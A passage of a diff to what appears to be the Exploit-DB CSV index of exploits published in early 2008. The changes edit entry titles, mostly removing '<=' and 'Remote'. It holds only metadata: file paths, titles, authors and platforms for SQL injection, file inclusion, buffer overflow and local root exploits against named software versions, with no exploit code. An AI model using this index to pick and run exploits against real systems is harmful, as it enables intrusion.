SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 -4966,platforms/php/webapps/4966.pl,"Invision Gallery <= 2.0.7 - Remote SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 +4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 +4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - (sid) SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 +4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final (sid) SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 +4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 4967,platforms/windows/remote/4967.html,"Lycos FileUploader Control ActiveX Remote Buffer Overflow Exploit",2008-01-22,Elazar,windows,remote,0 -4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) Remote SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 -4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - (voircom.php id) Remote SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 -4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums <= 9.07 - (sub) Remote Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 +4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 +4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - (voircom.php id) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 +4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Remote Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 4971,platforms/asp/webapps/4971.txt,"web wiz rich text editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Remote Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0 @@ -4624,13 +4624,13 @@ id,file,description,date,author,platform,type,port 4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - (optimizer.php files) Remote File Disclosure",2008-01-24,fuzion,php,webapps,0 4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 FileUploader Class InsecureMethod PoC",2008-01-24,rgod,windows,remote,0 4982,platforms/windows/remote/4982.html,"Gateway WebLaunch ActiveX Remote Buffer Overflow Exploit",2008-01-25,Elazar,windows,remote,0 -4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - Remote SQL Injection",2008-01-25,0in,php,webapps,0 -4985,platforms/php/webapps/4985.txt,"flinx <= 1.3 - (category.php id) Remote SQL Injection",2008-01-25,Houssamix,php,webapps,0 +4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0 +4985,platforms/php/webapps/4985.txt,"flinx 1.3 - (category.php id) SQL Injection",2008-01-25,Houssamix,php,webapps,0 4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 NamoInstaller.dll install Method Exploit",2008-01-25,plan-s,windows,remote,0 4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 AddFile() Remote Buffer Overflow Exploit",2008-01-25,Elazar,windows,remote,0 4988,platforms/asp/webapps/4988.txt,"candypress ecommerce suite 4.1.1.26 - Multiple Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 4989,platforms/php/webapps/4989.txt,"simple forum 3.2 - (fd/XSS) Multiple Vulnerabilities",2008-01-26,tomplixsee,php,webapps,0 -4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 Numerous Remote SQL Injection Vulnerabilities",2008-01-26,"Charles Hooper",php,webapps,0 +4990,platforms/php/webapps/4990.txt,"phpIP 4.3.2 Numerous SQL Injection Vulnerabilities",2008-01-26,"Charles Hooper",php,webapps,0 4991,platforms/php/webapps/4991.txt,"Bubbling Library 1.32 - Multiple Local File Inclusion Vulnerabilities",2008-01-26,Stack,php,webapps,0 4992,platforms/php/webapps/4992.txt,"WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 4993,platforms/php/webapps/4993.txt,"WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection",2008-01-27,Houssamix,php,webapps,0 @@ -4642,44 +4642,44 @@ id,file,description,date,author,platform,type,port 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - (MailBee.dll) Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 dispatcher.php Remote File Disclosure Vulnerabilities",2008-01-28,Stack,php,webapps,0 -5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 pollid Remote SQL Injection",2008-01-29,D4m14n,php,webapps,0 +5002,platforms/php/webapps/5002.txt,"Bigware Shop 2.0 pollid SQL Injection",2008-01-29,D4m14n,php,webapps,0 5003,platforms/php/webapps/5003.txt,"Smart Publisher 1.0.1 - (disp.php) Remote Code Execution",2008-01-29,GoLd_M,php,webapps,0 -5004,platforms/windows/local/5004.c,"Safenet IPSecDrv.sys <= 10.4.0.12 - Local kernel ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 +5004,platforms/windows/local/5004.c,"Safenet IPSecDrv.sys 10.4.0.12 - Local kernel ring0 SYSTEM Exploit",2008-01-29,mu-b,windows,local,0 5005,platforms/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - (ChilkatCert.dll) Insecure Method Exploit",2008-01-29,darkl0rd,windows,remote,0 5006,platforms/php/webapps/5006.txt,"phpCMS 1.2.2 - (parser.php) Remote File Disclosure",2008-01-29,DSecRG,php,webapps,0 -5007,platforms/php/webapps/5007.txt,"Mambo Component Newsletter (listid) Remote SQL Injection",2008-01-29,S@BUN,php,webapps,0 -5008,platforms/php/webapps/5008.txt,"Mambo Component Fq (listid) Remote SQL Injection",2008-01-29,S@BUN,php,webapps,0 -5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML (listid) Remote SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5007,platforms/php/webapps/5007.txt,"Mambo Component Newsletter (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5008,platforms/php/webapps/5008.txt,"Mambo Component Fq (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 +5009,platforms/php/webapps/5009.txt,"Mambo Component MaMML (listid) SQL Injection",2008-01-29,S@BUN,php,webapps,0 5010,platforms/php/webapps/5010.txt,"Mambo Component Glossary 2.0 - (catid) SQL Injection",2008-01-30,S@BUN,php,webapps,0 -5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes (aid) Remote SQL Injection",2008-01-30,S@BUN,php,webapps,0 -5012,platforms/php/webapps/5012.pl,"Connectix Boards <= 0.8.2 template_path Remote File Inclusion Exploit",2008-01-30,Houssamix,php,webapps,0 +5011,platforms/php/webapps/5011.txt,"Mambo Component musepoes (aid) SQL Injection",2008-01-30,S@BUN,php,webapps,0 +5012,platforms/php/webapps/5012.pl,"Connectix Boards 0.8.2 template_path Remote File Inclusion Exploit",2008-01-30,Houssamix,php,webapps,0 5013,platforms/php/webapps/5013.php,"WordPress Plugin Adserve 0.2 - adclick.php SQL Injection Exploit",2008-01-30,enter_the_dragon,php,webapps,0 -5014,platforms/php/webapps/5014.txt,"Mambo Component Recipes 1.00 - (id) Remote SQL Injection",2008-01-30,S@BUN,php,webapps,0 +5014,platforms/php/webapps/5014.txt,"Mambo Component Recipes 1.00 - (id) SQL Injection",2008-01-30,S@BUN,php,webapps,0 5015,platforms/php/webapps/5015.txt,"Mambo Component jokes 1.0 - (cat) SQL Injection",2008-01-30,S@BUN,php,webapps,0 -5016,platforms/php/webapps/5016.txt,"Mambo Component EstateAgent 0.1 - Remote SQL Injection",2008-01-30,S@BUN,php,webapps,0 +5016,platforms/php/webapps/5016.txt,"Mambo Component EstateAgent 0.1 - SQL Injection",2008-01-30,S@BUN,php,webapps,0 5017,platforms/php/webapps/5017.php,"WordPress Plugin WassUp 1.4.3 - (spy.php to_date) SQL Injection Exploit",2008-01-30,enter_the_dragon,php,webapps,0 -5018,platforms/php/webapps/5018.pl,"ibProArcade <= 3.3.0 - Remote SQL Injection Exploit",2008-01-30,RST/GHC,php,webapps,0 +5018,platforms/php/webapps/5018.pl,"ibProArcade 3.3.0 - SQL Injection Exploit",2008-01-30,RST/GHC,php,webapps,0 5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution Exploit",2008-01-30,waraxe,php,webapps,0 -5020,platforms/php/webapps/5020.txt,"Joomla Component ChronoForms 2.3.5 - RFI Vulnerabilities",2008-01-30,Crackers_Child,php,webapps,0 -5021,platforms/php/webapps/5021.txt,"PHP Links <= 1.3 - (vote.php id) Remote SQL Injection",2008-01-30,Houssamix,php,webapps,0 -5022,platforms/php/webapps/5022.txt,"PHP Links <= 1.3 smarty.php Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 +5020,platforms/php/webapps/5020.txt,"Joomla Component ChronoForms 2.3.5 - Remote File Inclusion Vulnerabilities",2008-01-30,Crackers_Child,php,webapps,0 +5021,platforms/php/webapps/5021.txt,"PHP Links 1.3 - (vote.php id) SQL Injection",2008-01-30,Houssamix,php,webapps,0 +5022,platforms/php/webapps/5022.txt,"PHP Links 1.3 smarty.php Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 5025,platforms/windows/remote/5025.html,"MySpace Uploader (MySpaceUploader.ocx 1.0.0.4) BoF Exploit",2008-01-31,Elazar,windows,remote,0 5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusion Vulnerabilities",2008-01-31,"David Wharton",php,webapps,0 5027,platforms/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure Vulnerabilities",2008-01-31,muuratsalo,php,webapps,0 5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - (ChilkatCert.dll) Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0 5029,platforms/php/webapps/5029.txt,"Mambo Component AkoGallery 2.5b SQL Injection",2008-01-31,S@BUN,php,webapps,0 5030,platforms/php/webapps/5030.txt,"Mambo Component Catalogshop 1.0b1 SQL Injection",2008-01-31,S@BUN,php,webapps,0 -5031,platforms/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - Remote SQL Injection",2008-01-31,S@BUN,php,webapps,0 +5031,platforms/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5032,platforms/windows/local/5032.c,"Total Video Player 1.03 M3U File Local Buffer Overflow Exploit",2008-02-01,"fl0 fl0w",windows,local,0 5033,platforms/php/webapps/5033.txt,"LightBlog 9.5 cp_upload_image.php Remote File Upload",2008-02-01,Omni,php,webapps,0 5034,platforms/php/webapps/5034.txt,"Joomla Component NeoReferences 1.3.1 - (catid) SQL Injection",2008-02-01,S@BUN,php,webapps,0 5035,platforms/php/webapps/5035.txt,"WordPress Plugin dmsguestbook 1.7.0 - Multiple Vulnerabilities",2008-02-02,NBBN,php,webapps,0 5036,platforms/windows/dos/5036.pl,"Titan FTP Server 6.03 - (USER/PASS) Remote Heap Overflow PoC",2008-02-02,securfrog,windows,dos,0 -5037,platforms/php/webapps/5037.txt,"The Everything Development System <= Pre-1.0 - SQL Injection",2008-02-02,sub,php,webapps,0 -5039,platforms/php/webapps/5039.txt,"WordPress Plugin Wordspew - Remote SQL Injection",2008-02-02,S@BUN,php,webapps,0 -5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 - (topicid) Remote SQL Injection",2008-02-02,S@BUN,php,webapps,0 -5041,platforms/php/webapps/5041.txt,"phpShop <= 0.8.1 - Remote SQL Injection / Filter Bypass Vulnerabilities",2008-02-02,"the redc0ders",php,webapps,0 -5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - (id) XSS / Remote SQL Injection Exploit",2008-02-02,"Khashayar Fereidani",php,webapps,0 +5037,platforms/php/webapps/5037.txt,"The Everything Development System Pre-1.0 - SQL Injection",2008-02-02,sub,php,webapps,0 +5039,platforms/php/webapps/5039.txt,"WordPress Plugin Wordspew - SQL Injection",2008-02-02,S@BUN,php,webapps,0 +5040,platforms/php/webapps/5040.txt,"BookmarkX script 2007 - (topicid) SQL Injection",2008-02-02,S@BUN,php,webapps,0 +5041,platforms/php/webapps/5041.txt,"phpShop 0.8.1 - SQL Injection / Filter Bypass Vulnerabilities",2008-02-02,"the redc0ders",php,webapps,0 +5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - (id) XSS / SQL Injection Exploit",2008-02-02,"Khashayar Fereidani",php,webapps,0 5043,platforms/windows/dos/5043.html,"Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BoF PoC Exploit",2008-02-02,h07,windows,dos,0 5044,platforms/windows/dos/5044.pl,"IpSwitch WS_FTP Server with SSH 6.1.0.0 - Remote Buffer Overflow PoC",2008-02-03,securfrog,windows,dos,0 5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 NamoInstaller.dll ActiveX BoF Exploit",2008-02-03,plan-s,windows,remote,0 @@ -4687,91 +4687,91 @@ id,file,description,date,author,platform,type,port 5047,platforms/php/webapps/5047.txt,"Joomla Component mosDirectory 2.3.2 - (catid) SQL Injection",2008-02-03,GoLd_M,php,webapps,0 5048,platforms/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 AddImage() ActiveX Remote BoF Exploit (2)",2008-02-03,exceed,windows,remote,0 5049,platforms/windows/remote/5049.html,"FaceBook PhotoUploader (ImageUploader4.ocx 4.5.57.0) BoF Exploit",2008-02-03,Elazar,windows,remote,0 -5050,platforms/php/webapps/5050.pl,"A-Blog 2 - (id) XSS / Remote SQL Injection Exploit",2008-02-03,"Khashayar Fereidani",php,webapps,0 +5050,platforms/php/webapps/5050.pl,"A-Blog 2 - (id) XSS / SQL Injection Exploit",2008-02-03,"Khashayar Fereidani",php,webapps,0 5051,platforms/windows/remote/5051.html,"Yahoo! Music Jukebox 2.2 AddButton() ActiveX Remote BoF Exploit (3)",2008-02-03,Elazar,windows,remote,0 5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid ActiveX mediagrid.dll AddBitmap() BoF Exploit",2008-02-03,Elazar,windows,remote,0 -5053,platforms/php/webapps/5053.txt,"WordPress Plugin st_newsletter - Remote SQL Injection",2008-02-03,S@BUN,php,webapps,0 -5054,platforms/hardware/dos/5054.c,"MicroTik RouterOS <= 3.2 SNMPd snmp-set Denial of Service Exploit",2008-02-03,ShadOS,hardware,dos,0 +5053,platforms/php/webapps/5053.txt,"WordPress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 +5054,platforms/hardware/dos/5054.c,"MicroTik RouterOS 3.2 SNMPd snmp-set Denial of Service Exploit",2008-02-03,ShadOS,hardware,dos,0 5055,platforms/php/webapps/5055.txt,"Joomla Component Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0 -5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 - (bidhistory.php item_id) Remote SQL Injection",2008-02-04,QTRinux,php,webapps,0 +5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 - (bidhistory.php item_id) SQL Injection",2008-02-04,QTRinux,php,webapps,0 5057,platforms/php/webapps/5057.txt,"XOOPS 2.0.18 - Local File Inclusion / URL Redirecting Vulnerabilities",2008-02-04,DSecRG,php,webapps,0 -5058,platforms/php/webapps/5058.txt,"Mambo Component Awesom <= 0.3.2 - (listid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 -5059,platforms/php/webapps/5059.txt,"Mambo Component Shambo2 - (Itemid) Remote SQL Injection",2008-02-04,S@BUN,php,webapps,0 +5058,platforms/php/webapps/5058.txt,"Mambo Component Awesom 0.3.2 - (listid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 +5059,platforms/php/webapps/5059.txt,"Mambo Component Shambo2 - (Itemid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 5060,platforms/php/webapps/5060.txt,"VHD Web Pack 2.0 - (index.php page) Local File Inclusion",2008-02-04,DSecRG,php,webapps,0 -5061,platforms/php/webapps/5061.txt,"All Club CMS <= 0.0.1f index.php Local File Inclusion",2008-02-04,Trancek,php,webapps,0 +5061,platforms/php/webapps/5061.txt,"All Club CMS 0.0.1f index.php Local File Inclusion",2008-02-04,Trancek,php,webapps,0 5062,platforms/php/webapps/5062.txt,"RMSOFT Gallery System 2.0 - (images.php id) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 -5063,platforms/windows/dos/5063.pl,"NERO Media Player <= 1.4.0.35b M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 -5064,platforms/php/webapps/5064.txt,"All Club CMS <= 0.0.2 index.php Remote SQL Injection",2008-02-05,ka0x,php,webapps,0 +5063,platforms/windows/dos/5063.pl,"NERO Media Player 1.4.0.35b M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 +5064,platforms/php/webapps/5064.txt,"All Club CMS 0.0.2 index.php SQL Injection",2008-02-05,ka0x,php,webapps,0 5065,platforms/php/webapps/5065.txt,"Photokorn Gallery 1.543 - (pic) SQL Injection",2008-02-05,you_kn0w,php,webapps,0 5066,platforms/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution Exploit",2008-02-05,"Alexander Concha",php,webapps,0 5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow PoC",2008-02-05,securfrog,windows,dos,0 -5068,platforms/php/webapps/5068.txt,"OpenSiteAdmin <= 0.9.1.1 - Multiple File Inclusion Vulnerabilities",2008-02-06,Trancek,php,webapps,0 +5068,platforms/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusion Vulnerabilities",2008-02-06,Trancek,php,webapps,0 5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow Exploit",2008-02-06,securfrog,windows,remote,0 5070,platforms/php/webapps/5070.pl,"MyBulletinBoard (MyBB) <= 1.2.11 - private.php SQL Injection Exploit",2008-02-06,F,php,webapps,0 5071,platforms/php/webapps/5071.txt,"Astanda Directory Project 1.2 - (link_id) SQL Injection",2008-02-06,you_kn0w,php,webapps,0 -5072,platforms/php/webapps/5072.txt,"Joomla Component Ynews 1.0.0 - (id) Remote SQL Injection",2008-02-06,Crackers_Child,php,webapps,0 -5073,platforms/php/webapps/5073.txt,"Mambo Component com_downloads Remote SQL Injection",2008-02-06,S@BUN,php,webapps,0 +5072,platforms/php/webapps/5072.txt,"Joomla Component Ynews 1.0.0 - (id) SQL Injection",2008-02-06,Crackers_Child,php,webapps,0 +5073,platforms/php/webapps/5073.txt,"Mambo Component com_downloads SQL Injection",2008-02-06,S@BUN,php,webapps,0 5074,platforms/php/webapps/5074.php,"Mihalism Multi Host Download (Username) Blind SQL Injection Exploit",2008-02-06,Moubik,php,webapps,0 5075,platforms/php/webapps/5075.txt,"osCommerce Addon Customer Testimonials 3.1 - SQL Injection",2008-02-07,"it's my",php,webapps,0 5076,platforms/php/webapps/5076.txt,"Mambo Component Sermon 0.2 - (gid) SQL Injection",2008-02-07,S@BUN,php,webapps,0 5077,platforms/windows/local/5077.cpp,"Total Video Player 1.20 M3U File Local Stack Buffer Overflow Exploit",2008-02-07,"fl0 fl0w",windows,local,0 -5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager <= 7.0.1 File Upload Exploit",2008-02-07,titon,windows,remote,0 +5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 File Upload Exploit",2008-02-07,titon,windows,remote,0 5079,platforms/windows/remote/5079.c,"SapLPD 6.28 - Remote Buffer Overflow Exploit (Win32)",2008-02-07,BackBone,windows,remote,515 -5080,platforms/php/webapps/5080.txt,"Joomla Component com_doc Remote SQL Injection",2008-02-07,S@BUN,php,webapps,0 +5080,platforms/php/webapps/5080.txt,"Joomla Component com_doc SQL Injection",2008-02-07,S@BUN,php,webapps,0 5081,platforms/php/webapps/5081.txt,"Joomla Component com_noticias 1.0 - SQL Injection",2008-02-07,xcorpitx,php,webapps,0 5082,platforms/php/webapps/5082.txt,"PowerNews (Newsscript) 2.5.6 - Local File Inclusion Vulnerabilities",2008-02-08,DSecRG,php,webapps,0 5083,platforms/php/webapps/5083.txt,"Joomla Component NeoGallery 1.1 - SQL Injection",2008-02-08,S@BUN,php,webapps,0 -5084,platforms/php/webapps/5084.txt,"Mambo Component com_gallery Remote SQL Injection",2008-02-08,S@BUN,php,webapps,0 -5085,platforms/windows/dos/5085.txt,"jetAudio <= 7.0.5 - (.ASX) Remote Stack Overflow Exploit PoC",2008-02-08,"laurent gaffié ",windows,dos,0 +5084,platforms/php/webapps/5084.txt,"Mambo Component com_gallery SQL Injection",2008-02-08,S@BUN,php,webapps,0 +5085,platforms/windows/dos/5085.txt,"jetAudio 7.0.5 - (.ASX) Remote Stack Overflow Exploit PoC",2008-02-08,"laurent gaffié ",windows,dos,0 5086,platforms/windows/dos/5086.html,"ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow PoC",2008-02-08,Trancek,windows,dos,0 5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module Remote Buffer Overflow Exploit",2008-02-09,rgod,windows,remote,0 -5088,platforms/php/webapps/5088.py,"Limbo CMS <= 1.0.4.2 Cuid cookie Blind SQL Injection Exploit",2008-02-09,The:Paradox,php,webapps,0 +5088,platforms/php/webapps/5088.py,"Limbo CMS 1.0.4.2 Cuid cookie Blind SQL Injection Exploit",2008-02-09,The:Paradox,php,webapps,0 5089,platforms/php/webapps/5089.txt,"DomPHP 0.82 - (index.php page) Local File Inclusion",2008-02-09,Houssamix,php,webapps,0 -5090,platforms/php/webapps/5090.pl,"Open-Realty <= 2.4.3 - (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 -5091,platforms/php/webapps/5091.pl,"Journalness <= 4.1 - (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 +5090,platforms/php/webapps/5090.pl,"Open-Realty 2.4.3 - (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 +5091,platforms/php/webapps/5091.pl,"Journalness 4.1 - (last_module) Remote Code Execution Exploit",2008-02-09,Iron,php,webapps,0 5092,platforms/linux/local/5092.c,"Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2)",2008-02-09,qaaz,linux,local,0 5093,platforms/linux/local/5093.c,"Linux Kernel 2.6.23 <= 2.6.24 - 'vmsplice' Local Root Exploit (1)",2008-02-09,qaaz,linux,local,0 -5094,platforms/php/webapps/5094.txt,"Mambo Component Comments <= 0.5.8.5g SQL Injection",2008-02-09,CheebaHawk215,php,webapps,0 +5094,platforms/php/webapps/5094.txt,"Mambo Component Comments 0.5.8.5g SQL Injection",2008-02-09,CheebaHawk215,php,webapps,0 5095,platforms/php/webapps/5095.txt,"PKs Movie Database 3.0.3 - XSS / SQL Injection Vulnerabilities",2008-02-10,Houssamix,php,webapps,0 5096,platforms/php/webapps/5096.txt,"ITechBids 6.0 - (detail.php item_id) SQL Injection",2008-02-10,"SoSo H H",php,webapps,0 5097,platforms/php/webapps/5097.txt,"SAPID CMF Build 87 - (last_module) Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 - (last_module) Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 -5099,platforms/php/webapps/5099.php,"Mix Systems CMS (parent/id) Remote SQL Injection Exploit",2008-02-10,halkfild,php,webapps,0 +5099,platforms/php/webapps/5099.php,"Mix Systems CMS (parent/id) SQL Injection Exploit",2008-02-10,halkfild,php,webapps,0 5100,platforms/windows/remote/5100.html,"ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX BoF Exploit",2008-02-10,Elazar,windows,remote,0 -5101,platforms/php/webapps/5101.pl,"vKios <= 2.0.0 - (products.php cat) Remote SQL Injection Exploit",2008-02-12,NTOS-Team,php,webapps,0 -5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader <= 5.0.14.0 - Remote Buffer Overflow Exploit",2008-02-12,"MC Group Ltd. ",windows,remote,0 -5103,platforms/php/webapps/5103.txt,"Joomla Component rapidrecipe <= 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 -5104,platforms/php/webapps/5104.txt,"Joomla Component pcchess <= 0.8 - Remote SQL Injection",2008-02-12,S@BUN,php,webapps,0 -5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - (gallery_data.php) Remote SQL Injection Exploit",2008-02-12,DNX,php,webapps,0 +5101,platforms/php/webapps/5101.pl,"vKios 2.0.0 - (products.php cat) SQL Injection Exploit",2008-02-12,NTOS-Team,php,webapps,0 +5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow Exploit",2008-02-12,"MC Group Ltd. ",windows,remote,0 +5103,platforms/php/webapps/5103.txt,"Joomla Component rapidrecipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 +5104,platforms/php/webapps/5104.txt,"Joomla Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 +5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - (gallery_data.php) SQL Injection Exploit",2008-02-12,DNX,php,webapps,0 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX Heap BoF Exploit",2008-02-12,Elazar,windows,remote,0 5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - (.wps) Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 BETA - (language) Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 -5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 - (aid) Remote SQL Injection",2008-02-13,S@BUN,php,webapps,0 +5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 - (aid) SQL Injection",2008-02-13,S@BUN,php,webapps,0 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - SEH Overwrite Exploit",2008-02-13,Elazar,windows,remote,0 5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 -5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 - (Firmware <= 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 +5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 - (Firmware 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 BETA - XSS / SQL Injection Exploit",2008-02-14,"Khashayar Fereidani",php,webapps,0 5115,platforms/php/webapps/5115.txt,"nuBoard 0.5 - (threads.php ssid) SQL Injection",2008-02-14,"Khashayar Fereidani",php,webapps,0 5116,platforms/php/webapps/5116.txt,"artmedic weblog 1.0 - Multiple Local File Inclusion Vulnerabilities",2008-02-14,muuratsalo,php,webapps,0 5117,platforms/php/webapps/5117.txt,"Joomla Component paxxgallery 0.2 - (iid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 5118,platforms/php/webapps/5118.txt,"Joomla Component MCQuiz 0.9 Final (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 -5119,platforms/php/webapps/5119.txt,"Joomla Component Quiz <= 0.81 - (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 +5119,platforms/php/webapps/5119.txt,"Joomla Component Quiz 0.81 - (tid) SQL Injection",2008-02-14,S@BUN,php,webapps,0 5120,platforms/php/webapps/5120.pl,"Joomla Component mediaslide (albumnum) Blind SQL Injection Exploit",2008-02-14,Inphex,php,webapps,0 5121,platforms/php/webapps/5121.txt,"LookStrike Lan Manager 0.9 - Remote / Local File Inclusion Vulnerabilities",2008-02-14,MhZ91,php,webapps,0 5122,platforms/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 M3U File Remote Buffer Overflow PoC",2008-02-14,securfrog,windows,dos,0 -5123,platforms/php/webapps/5123.txt,"Scribe <= 0.2 - (index.php page) Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 +5123,platforms/php/webapps/5123.txt,"Scribe 0.2 - (index.php page) Local File Inclusion",2008-02-14,muuratsalo,php,webapps,0 5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0 -5125,platforms/php/webapps/5125.txt,"PHP Live! <= 3.2.2 - (questid) Remote SQL Injection (1)",2008-02-14,Xar,php,webapps,0 +5125,platforms/php/webapps/5125.txt,"PHP Live! <= 3.2.2 - (questid) SQL Injection (1)",2008-02-14,Xar,php,webapps,0 5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0-2.1 - SQL 